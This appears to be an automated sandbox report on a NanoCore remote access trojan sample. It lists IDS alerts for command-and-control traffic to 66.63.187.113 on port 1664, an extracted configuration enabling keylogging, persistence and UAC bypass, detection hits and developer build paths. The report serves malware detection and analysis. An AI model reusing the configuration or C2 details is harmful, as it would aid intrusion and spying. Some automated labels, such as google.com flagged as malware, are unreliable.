2024-11-01T06:19:36.500112+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:37.498984+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:43.688692+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:49.719815+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:54.777302+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:55.780055+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:20:06.077464+0100	2046914	1	Malware Command and Control Activity Detected	192.168.2.5	49988	66.63.187.113	1664	TCP

ET MALWARE NanoCore RAT Keepalive Response 1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:19:25.999606+0100	2046909	1	A Network Trojan was detected	66.63.187.113	1664	192.168.2.5	49760	TCP

ET MALWARE Possible NanoCore C2 60B

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:18:58.053284+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:05.438985+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.336174+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:12.328544+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:14.166101+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:18.348337+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:20.200101+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:24.364629+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:26.212247+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:30.402479+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:32.246562+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:36.492343+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:38.336053+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:42.535720+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:44.450133+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:48.743097+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:50.690817+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:54.755415+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:56.631885+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:20:00.868716+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49962	66.63.187.113	1664	TCP
2024-11-01T06:20:05.832968+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49988	66.63.187.113	1664	TCP
2024-11-01T06:20:11.098540+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49993	66.63.187.113	1664	TCP
2024-11-01T06:20:16.117228+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49994	66.63.187.113	1664	TCP
2024-11-01T06:20:21.114434+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49995	66.63.187.113	1664	TCP
2024-11-01T06:20:26.132572+0100	2025019	1	Malware Command and Control Activity Detected	192.168.2.5	49996	66.63.187.113	1664	TCP

ETPRO MALWARE NanoCore RAT CnC 19

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:18:58.936669+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:00.089903+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:06.283817+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.281024+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:12.333818+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:13.326855+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:19.326895+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:24.373797+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:25.373809+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:30.477669+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:31.467571+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:36.500112+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:37.498984+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:43.688692+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:49.719815+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:54.777302+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:55.780055+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:20:06.077464+0100	2822326	1	Malware Command and Control Activity Detected	192.168.2.5	49988	66.63.187.113	1664	TCP

ETPRO MALWARE NanoCore RAT Keep-Alive Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T06:19:30.477669+0100	2816718	1	A Network Trojan was detected	192.168.2.5	49794	66.63.187.113	1664	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://google.com	URL Reputation: Label: malware
Source: http://google.com	URL Reputation: Label: malware

Found malware configuration

Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "a376f716-2f77-4943-a431-3a3bcb53", "Group": "CAT", "Domain1": "66.63.187.113", "Domain2": "66.63.187.113", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for domain / URL

Source: 66.63.187.113

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\DNS Host\dnshost.exe	ReversingLabs: Detection: 50%
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Virustotal: Detection: 38%			Perma Link

Multi AV Scanner detection for submitted file

Source: nD2ozRD7MN.exe	ReversingLabs: Detection: 50%
Source: nD2ozRD7MN.exe	Virustotal: Detection: 38%			Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\DNS Host\dnshost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: nD2ozRD7MN.exe

Joe Sandbox ML: detected

Source: nD2ozRD7MN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: nD2ozRD7MN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPlugin.pdblt source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreStressTester.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Accessibility.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: FileBrowserClient.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.pdbu source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Accessibility.pdbP source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Core.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.pdbt^ source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreStressTester.pdbxX source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Drawing.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPluginNew.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MyClientPlugin.pdbL0 source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPlugin.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreBase.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdby source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then jmp 082B21B6h	0_2_082B1667
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then jmp 082B21B6h	0_2_082B16E2
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	5_2_078E5580
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	5_2_078E5570
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then jmp 025A21B6h	9_2_025A1667
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 4x nop then jmp 025A21B6h	9_2_025A16E2
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 4x nop then jmp 07D121B6h	15_2_07D116E2
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 4x nop then jmp 07D121B6h	15_2_07D11667
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 4x nop then jmp 00F20C86h	19_2_00F201B2
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 4x nop then jmp 00F20C86h	19_2_00F20137

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49713 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49713 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49710 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49710 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49707 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49707 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49729 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49729 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49760 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49760 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046909 - Severity 1 - ET MALWARE NanoCore RAT Keepalive Response 1 : 66.63.187.113:1664 -> 192.168.2.5:49760
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49794 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2816718 - Severity 1 - ETPRO MALWARE NanoCore RAT Keep-Alive Beacon : 192.168.2.5:49794 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49794 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49827 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49827 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49862 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49862 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49896 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49896 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49931 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49931 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.5:49988 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.5:49988 -> 66.63.187.113:1664

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 66.63.187.113

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 66.63.187.113:1664

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49713 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49710 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49729 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49707 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49760 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49794 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49827 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49862 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49896 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49931 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49988 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49993 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49962 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49996 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49994 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.5:49995 -> 66.63.187.113:1664
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49907

Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.113
